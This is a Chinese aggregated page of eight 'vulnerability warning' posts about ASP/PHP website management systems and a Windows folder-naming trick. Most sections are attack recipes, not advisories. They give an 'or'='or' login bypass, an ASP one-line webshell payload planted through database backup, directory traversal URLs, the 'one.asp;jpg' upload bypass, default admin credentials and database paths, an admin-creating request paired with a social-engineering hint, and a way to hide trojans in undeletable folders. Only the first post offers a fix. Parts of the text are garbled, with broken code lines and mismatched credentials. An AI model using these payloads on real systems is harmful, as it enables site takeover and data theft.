以下是小编为大家准备了正方高校教务管理系统漏洞修复漏洞预警,本文共8篇,欢迎参阅。本文原稿由网友“oyi”提供。
篇1:正方高校教务管理系统漏洞修复漏洞预警
正方高校教务管理系统是一款学生成绩,选课管理系统,目前有众多高校使用这款教务管理系统,
正方高校教务管理系统漏洞修复漏洞预警
,
近期该系统爆出了一个高危漏洞,攻击者可以利用该漏洞轻易获取网站webshell权限。下面给出漏洞的情况和修复方法:
漏洞类型:上传漏洞
漏洞文件:/ftb.imagegallery.aspx
该漏洞文件没有任何权限限制,访问者可以直接访问该文件,从而通过文件自有的上传功能,来上传构造好的可以解析的后门文件。
漏洞修复:可以设置images目录脚本解析权限为无.有能力的可以针对此文件做好权限身份验证,禁止普通用户访问.
漏洞补丁:请联系正方公司升级网站程序
篇2:机智内容管理系统漏洞漏洞预警
###########################################################################################
02.# Title: witcms 机智内容管理系统漏洞
03.
04.# Time:-09-09
05.
06.# Team:MakeBug
07.
08.# Author: 缘分
09.
10.###########################################################################################
11.
12.前台注入: 参考注入篇
13.
14.后台:拿shell
15.
16.MakeBug Micropoor@163.com
17.
18.// \\admin\\article_insert.php
19.// \\admin\\article_updata.php
20.
21.
22.if(!empty($_FILES[file][name])){
23. // 略
24. $file_type = $_FILES[“file”][“type”]; //把上传文件类型另存为数组
25. for($i=0;$i
26. if($file_name[$i]!=''){
27. if ((($file_type[$i] == “image/gif”) || ($file_type[$i] == “image/jpeg”) || ($file_type[$i] == “image/pjpeg”)) && ($file_type[$i] < 1024000)){
28. // ...略,此处是重命名
29. }
30.
31.只是检测了type,文件头,gif89a45sd即可,
机智内容管理系统漏洞漏洞预警
,
32.
33.默认上传一句话路径:\\uploadfile\\+文件名
34.
35.另调用了FCKeditor编辑器。
36.
37.默认test路径:\\admin\\FCKeditor\\editor\\filemanager\\connectors\\test.html
38.
39. \\admin\\FCKeditor\\editor\\filemanager\\connectors\\uploadtest.html
40.
41.#www.badguest.com/vul/
篇3:小鼻子文章管理系统漏洞漏洞预警
从A5网站上 随便下了一个asp的建站系统 “小鼻子文章管理系统”
打开以后 发现做的还不错
来到后台/admin/login.asp 默认试了一下万能密码 'or'='or' 发现竟然进去了
来看一下源码
① login.asp文件
<%
Dim errmsg
username=Request(“username”)
password=Request(“password”)
verifycode=Request(“verifycode”)
If username=“” Or password=“” Then
Response.Redirect “login.asp?errno=2”
Response.End
End If
这是一处,发现没有过滤然后是 奇怪的竟然在 验证码这转化。
If Cstr(Session(“getcode”))Lcase(Cstr(Trim(Request(“verifycode”)))) Then
Response.Redirect “login.asp?errno=0”
Response.End
End If
%>
来看一下 防注入文件/inc/AntiAttack.asp分两部分组成
①----- 对 get query 值 的过滤.
②-----对 post 表 单值的过滤.
对post的代码如下
if request.form“” then
Chk_badword=split(Form_Badword,“‖”)
FOR EACH form_name2 IN Request.Form
for i=0 to ubound(Chk_badword)
If Instr(LCase(request.form(form_name2)),Chk_badword(i))0 Then
Select Case Err_Message
Case “1”
Response.Write “”
Case “2”
Response.Write “”
Case “3”
Response.Write “”
End Select
Response.End
End If
NEXT
NEXT
end if
%>
开头“if request.from”
很显然 在后台登陆界面 的 用户和密码处并没有进行判断
所以使用万能密码 可以直接登陆后台
二 、后台上传shell
我简单的看了一下 可以用备份 的方法
首先 先对网站进行 备份 后面 还原用到
在“网站信息设置”出我们插上 闭合型一句话
%><%eval request(“0o1Znz1ow”)%><%
然后备份 xx.asp or xx.cer 等
在 /DataBaseX/文件下 会出现我们的马了
篇4:世纪风企业网站管理系统漏洞漏洞预警
by Mr.DzY
世纪风企业网站管理系统面向中小企业的网站管理系统,网页精美,大气,具有稳性定强,功能多,安全,代码加载速度快,网站内容管理的易操作性等优点。采用div+css构架,是中小型企业建站的理想选择。
世纪风企业网站管理系统 1.3 更新内容:
1、增加部分后台提示;
2、修复后台订单管理中删除订单出现的错误;
3、其它细节的修改;
免费版:
www.myhack58.com/_database/qiye_free.asp
企业版:
www.myhack58.com/_database/_qiyedata.asp
插马:
www.myhack58.com/guestbook.asp
其它的不说了,你知道的,
PS:操作有风险,请慎重。
篇5:Netin(奈特)内容管理系统漏洞漏洞预警
一个很冷的内容管理系统,第一次见,
后台路径:netin/Login.asp
默认用户:admin/netin
默认密码:000000/netin
默认数据库:#db$snetinb\\#db$snetin.mdb
默认管理员表:Bs_User
注入点:0day5.com/shownews.asp?id=
篇6:ideacms文章管理系统漏洞及修复
'\\admin\\admin_upfile.asp
<%
'略
dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath
dim dirTemplate : dirTemplate=“../Upload”
dim path : path=getForm(“path”,“get”) : if isNul(path) then path= dirTemplate
if left(path,9)“../Upload” then alert “只允许编辑Upload目录”,“admin_upfile.asp” : die “”
'略
%>
判断问题,
利用方法:
/admin/admin_upfile.asp?path=../Upload/../../
'\\admin\\admin_template.asp
<%
checkPower
'略
dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath
dim dirTemplate : dirTemplate=“../template”
dim path : path=getForm(“path”,“get”) : if isNul(path) then path= dirTemplate
if left(path,11)“../template” then alert “只允许编辑template目录”,“admin_template.asp” : die “”
'略
%>
判断问题。
利用方法:
/admin/admin_template.asp?action=edit&filedir=../template/../robots.txt
shell篇:
'/admin/upload.asp
<%
'略
attachdir=“/”+sitePath+“upload”'上传文件保存路径,结尾不要带/
dirtype=2'1:按天存入目录 2:按月存入目录 3:按扩展名存目录 建议使用按天存
maxattachsize=2097152'最大上传大小,默认是2M
upext=“txt,rar,zip,jpg,jpeg,gif,png,swf,wmv,avi,wma,mp3,mid”'上传扩展名
'略
if upfile.isErr=3 then
err=“上传文件扩展名必需为:”+upext
else
err=upfile.ErrMessage
'略
Dim tmpPath
isErr_=0
Set FileStream = CreateObject (“ADODB.Stream”)
oFileStream.Type = 1
oFileStream.Mode = 3
oFileStream.CharSet = “gb2312”
'略
tmpPath=Split(Path,“.”)(0)
FileExt=GetFileExt(Path)
if Over then
if isAllowExt(FileExt) then
oFileStream.SaveToFile tmpPath & “.” & FileExt,2
if Err.number0 then OutErr(“保存文件时出错,请检查路径,是否存在该上传目录!该文件保存路径为” & tmpPath & “.” & FileExt)
Else
isErr_=3
ErrMessage_=“该后缀名的文件不允许上传!”
OutErr(“该后缀名的文件不允许上传”)
End if
Else
'略
Public Function FileData(Item)
isErr_=0
if file.Exists(Item) then
if isAllowExt(File(Item).FileExt) then
'略
Else
isErr_=3
ErrMessage_=“该后缀名的文件不允许上传”
OutErr(“该后缀名的文件不允许上传”)
FileData=“”
End if
else
ErrMessage_=“不存在该对象(如该文件没有上传,文件为空)!”
OutErr(“不存在该对象(如该文件没有上传,文件为空)”)
'略
%>
判断问题:
构造文件名:one.asp;jpg
上传地址:
/admin/editor/upload.htm
其他信息:
默认数据库地址:\\date\\#A5E371101111.mdb
篇7:Windows文件系统漏洞小漏洞,大用处漏洞预警
1.Windows中很有用的文件替换命令,绕过文件保护
用来替换文件的replace,连正在使用的文件也能替换,非常无敌。
比如:在C:\\下建一个目录,c:\\aaa
然后复制一首mp3到c:\\aaa并命名为c:\\aaa\\a.mp3
然后再复制另一首歌到C:\\a.mp3
然后用media player 播放c:\\aaa\\a.mp3
在命令提示符下输入:replace c:\\a.mp3 c:\\aaa
过一会,是不是播放的歌已变为另一首。
用这个命令来替换系统文件真是太爽了,并且XP的系统文件保护也对它无效。
再也不用到安全模式下去替换文件了
2.Windows文件系统漏洞-小漏洞,大用处
大家都知道在Windows中“\”符号是路径的分隔符号,比如“C:\\Windows\”的意思就是C分区中的Windows文件夹,“C:\\Windows\\System.exe”的意思就是C分区中的Windows文件夹中的System.exe文件,好继续我们假设一下:
如果文件名中有“\”符号会怎么样呢?假如“S\”是一个文件夹的名字,这个文件夹位于:“F:\”,他的路径就是“F:\\S\”,当我们试图访问的时候Windows会错误的认为我们要打开的文件是C分区的S文件夹,这样Windows就无法打开并且会返回一个错误,因为以上的路径并不存在。
也许你现在正在尝试创建“S\”文件,但是Windows会提示你:“\”符号是不能作为文件、文件夹的名字的。看来Windows还是早已想到这一点了的。OK我们继续进行,就不信不能建立包含“\”符号的文件。
现在打开你的电脑,我们要做一些很有趣的尝试。进入Windows后 点击:开始>运行 然后输入“cmd”并会车(如果是Win98请输入“COMMAND”),这时你会看到Windows的命令控制台,我们就是要利用它完成我们剩下的测试,以下包含了很多命令其中{}中的字符是我的注释:
quote:
--------------------------------------------------------------------------------
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985- Microsoft Corp.
F:\\Test>mkdir s\\ {我们的第一次尝试,结果Windows只创建了S文件夹“\\”被忽略掉了}
F:\\Test>mkdir s\\s1\\ {还是失败,Windows先创建了S文件夹,然后在S内创建s1文件夹}
F:\\Test>mkdir s.\\ {“s.\\”被解析成S“.\\”又被忽略了}
子目录或文件 s.\\ 已经存在。
F:\\Test>mkdir s..\\ {终于成功了,现在你可以在资源管理器看到“s.”但却无法打开/删除}
F:\\Test>mkdir s...\\ {又成功了,在资源浏览器能看到“s..”可以打开但是无法删除}
为什么会这样?我们先说你看到的这个“S.”文件夹,他即不能打开也不能删除,不能打开是因为他的实际路径是“F:\\Test\\s..\”(我们自己创建的所以可以确定他的实际路径)但是在Windows资源管理器中名字变成了“S.”也就是说当你试图打开它的时候Windows实际上尝试打开“F:\\Test\\s.\”当然是不能打开的,文件并不存在,所以Windows会报错。不能删除也是因为这个,Windows把一个实际存在的文件路径错误的解析为一个不存在的路径,并进行操作当然是无法完成的。
该说“S..”这个文件了,这个文件可以打开,但是却无法删除。等等……打开?你以为Windows真的是打开了我们创建的“s...\”文件了吗?我们做下面的试验你就明白了。还是老规矩{}是我的注释方便大家理解:
quote:
--------------------------------------------------------------------------------
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
F:\\Test>echo 1 >Txt1.txt {创建“F:\\Test\\Txt1.txt”文件}
F:\\Test>copy Txt1.txt s..\\ {复制刚刚创建的文件到“s..\”,就是资源管理器的“S.”}
已复制 1 个文件,
F:\\Test>echo 2 >Txt2.txt {创建“F:\\Test\\Txt2.txt”文件}
F:\\Test>copy Txt2.txt s..\\ {复制刚刚创建的文件到“s...\”,资源管理器的“S..”}
已复制 1 个文件。
F:\\Test>
现在回到你的资源管理器打开“S..”文件夹,你看到了什么?“Txt1.txt”文件怎么会在这里?我们刚刚的确复制到了“S.”呀?难道我们打开“S..”文件夹实际上就是打开了“S.”?不错事实就是这样。其实如果你再创建一个“S”文件夹的话“S.”就能打开了,但是实际上打开的是“S”。
“我该怎么删除它呢?”,删除它也不算很难,但是常规的方法是绝对删不掉的。有两种方法可供选择:1;进入DOS删除(不推荐)。2;还是进入命令提示符然后输入“rmdir 目录名”,目录名就是你创建的时候的名字,如果忘记了可以先在资源管理器查看,然后加上“.\”。如果提示“文件夹不是空的”应该加上“/s”参数。删除实例:
quote:
--------------------------------------------------------------------------------
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
F:\\Test>dir
驱动器 F 中的卷是 BGTING
卷的序列号是 2C8E-FE1C
F:\\Test 的目录
-09-11 17:50
2003-09-11 17:50
2003-09-11 18:35
2003-09-11 18:37
1 个文件 9 字节
5 个目录 3,390,029,824 可用字节
F:\\Test>rmdir s..目录不是空的。
F:\\Test>rmdir s..\\ /s
s..\\, 是否确认(Y/N)? y
F:\\Test>rmdir s...\\ /s
s...\\, 是否确认(Y/N)? y利用这个漏洞我们可以做很多事情,比如想访问“S”文件夹,但是没有权限的时候我们可以创建“S..\”来指向“S”这样就可以跨权限浏览。而且新一代的木马程序很可能利用此漏洞把自身藏在某个“X..\”目录下这样用户根本不可能发现他,就算专业级的杀毒软件也只会去杀“X”而跳过“X..\”。如果恶意程序在机的计算机上创建很多“..\”文件夹的话,哈哈~那个时候Fotmat也许是最好的选择了。现在微软官方好像还没有发布任何防范措施。
怎么样是不是有点晕了?不要怕“晕”是很正常的,我已经晕了很多次了。 :)
好了,说了这么多可能有点乱了。下面我总结一下:
1;在Windows中创建“X..\”文件夹后该文件夹将无法通过常规方法删除,但是却可以Copy文件进去,在资源管理器显示为“X.”,错误的指向“X”文件夹。(嘿嘿,怎么有点像快捷方式?)
2;创建“X..\”的方法是在命令行输入“mkdir X..\”。
3;删除它的方法是在命令行输入“rmdir 目录名”,目录名就是你创建的时候的名字,如果忘记了可以先在资源管理器查看,然后加上“.\”。如果提示“文件夹不是空的”应该加上“/s”参数。
4;暂无防范方法。
篇8:TAYGOD免费企业建站系统漏洞 TAYGOD 0day漏洞预警
一 系统简介
TAYGOD免费企业建站系统是一款开源的免费程序,您可以
TAYGOD免费企业建站系统ASP版是一款基于asp+access的免费开源建站系统,整套系统的设计构造,完全考虑中小企业类网站的功能要求,网站后台功能强大,管理简捷,支持模板机制,能够快速建立您的企业网站。
系统特性:
采用流行的asp+access设计,功能强,实用性高。
代码美工完全分离,维护更方便。
对运行环境要求低,基本上一般的空间都支持此网站系统的运行。
完美整合KindEditor编辑器,所见所得发布各类图文信息。
后台操作简洁,无需专业知识,即可掌控整站。
风格模板机制简单,通过简单的HTML制作即可,后台提供完善的标签调用说明与示例。
后台数据库备份,您可以通过FTP工具将备案的数据库文件下载到您本地电脑中。
一:添加管理员XSS漏洞。
漏洞文件:\\source\\adminAdmin_Add.asp
漏洞代码:
<%if request.QueryString(“action”)=”save”thenuid=replace(trim(Request(“uid”)),”‘”,”“)realname=replace(trim(Request(“realname”)),”‘”,””)pwd1=replace(trim(Request(“pwd1″)),”‘”,”“)pwd2=replace(trim(Request(“pwd2″)),”‘”,””)password=md5(pwd1)
未进行验证直接写入数据,
漏洞测试:
127.0.0.1/asp/source/admin/Admin_Add.asp?action=save&uid=test&realname=test&pwd1=itlynn&pwd2=password
将生成一个用户名与密码为:123456 password 的管理员。
至于怎么欺骗管理员打开,这就需要一点社工技术了。
自己研究吧。
二:留言板XSS漏洞
漏洞文件:\\Message.asp
漏洞测试:在留言板页面插入XSS代码。
- WebPageTest任意php文件上传漏洞预警2024-04-09
- 南方数据网站管理系统注入漏洞&后台拿WebShell漏洞预警2025-01-25
- 教务管理职位个人简历2024-03-02
- 魔方网络摄影系统注入漏洞及利用漏洞预警2022-12-15
- 知乎一个存储型跨站漏洞及修复2023-09-01
- 给个拿微尔程序的站的方法漏洞预警2023-09-13
- 宁波工程学院教务管理系统2024-07-29
- 启航通信企业建站CMS系统v1.1 0day漏洞预警2023-02-02
- 微软发布补丁修复core duo耗电问题Windows漏洞2023-07-06
- 快捷留言簿v10.09 正式版上传漏洞和Cookie欺骗漏洞漏洞预警2022-12-20